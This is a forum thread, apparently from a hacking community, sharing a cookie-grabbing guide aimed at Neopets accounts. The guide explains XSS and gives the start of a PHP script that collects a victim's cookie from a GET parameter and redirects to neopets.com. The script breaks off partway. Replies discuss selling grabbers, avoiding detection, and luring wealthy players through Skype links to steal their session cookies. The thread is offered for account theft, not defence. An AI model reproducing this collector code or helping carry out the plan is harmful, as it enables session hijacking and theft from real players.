How much are you willing to pay , it would not come cheap. The risk of them being patched when sold gos up alot and I have no control over what you do with it.
First off, thank you to Inq for giving me a couple accounts to cookie grab.
Secondly, thank you to Kyo for his expertise; most of what I've learned is from him. The rest, I learned along the way. Now, onto the guide.
Thirdly, yes. You really are looking at a cookie grabbing guide. No, this guide will not kill the market. But maybe this might in Level 3...? Doesn't matter anyway.
Cross-site scripting (XSS) is possible when a site has insecure coding. When websites allow us to interact with them (e.g. search box, comment boxes, etc) and don't keep it secure, they render themselves vulnerable to code injection.
Many CGers take advantage of this and employ PHP and Javascript to snag the cookies. XSS itself isn't needed to CG, however but is just a step away from PHP/JS.
Requirements
Basic knowledge of HTML
A website host (nearlyfreespeech, tech.coop, netfirms, etc)
Writing the script
People use PHP to retrieve the cookies and record it to a text file. A PHP script begins with <?php and ends with ?>.
[code]
<?php
header("Location: http://www.neopets.com/index.phtml");
// This is a redirect link takes the user to the specified link
// after they view the page the cookie-grabbing code is on.
$cookie = $_GET['cookie'];
[COLOR=#FF8C00]// This line sends data to the PHP file using the GET command.
// The data is named
Such a cookie grabber would be reportable and detectable extremly fast. Anything you put on profiles ect is logged by neopets , they can see the code you use and patch it. The best ones in my opinion are done offsite and target a particular person. Usually they wont even know it happened and by the time they do , you could of already moved your code.
Oh sweet! :o
Now I need a host for a website.
Need to find a rich player get there skype or something then link them to something to grab there cookies with there neopets data in it.
Is this what you are saying @(you need an account to see links)